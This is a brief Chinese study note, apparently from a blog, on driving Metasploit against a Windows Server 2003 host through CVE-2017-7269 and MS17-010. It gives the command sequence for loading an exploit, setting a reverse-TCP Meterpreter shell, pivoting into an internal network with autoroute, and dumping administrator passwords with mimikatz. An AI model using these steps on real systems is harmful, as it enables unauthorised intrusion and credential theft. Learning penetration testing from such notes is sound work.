天天看点

【学习笔记】msf的使用

目标主机:2003rs2

漏洞:cve-2017-7269 ms17-010

exp搜索 : search cve-xxx

利用:use exp名称

看配置:show options

配置:set 配置名 一个值

设置payload:set payload windows/meterpreter/reverse_tcp(反弹shell)

最终攻击:exploit

把shell放后台:background

交互:session -l 然后 session -i 1

添加路由攻击内网:run autoroute -s 目标网段/24

你还应该去了解meterpreter的功能

例如screenshot 截屏

       load mimikatz 然后wdigest 获取管理员密码

继续阅读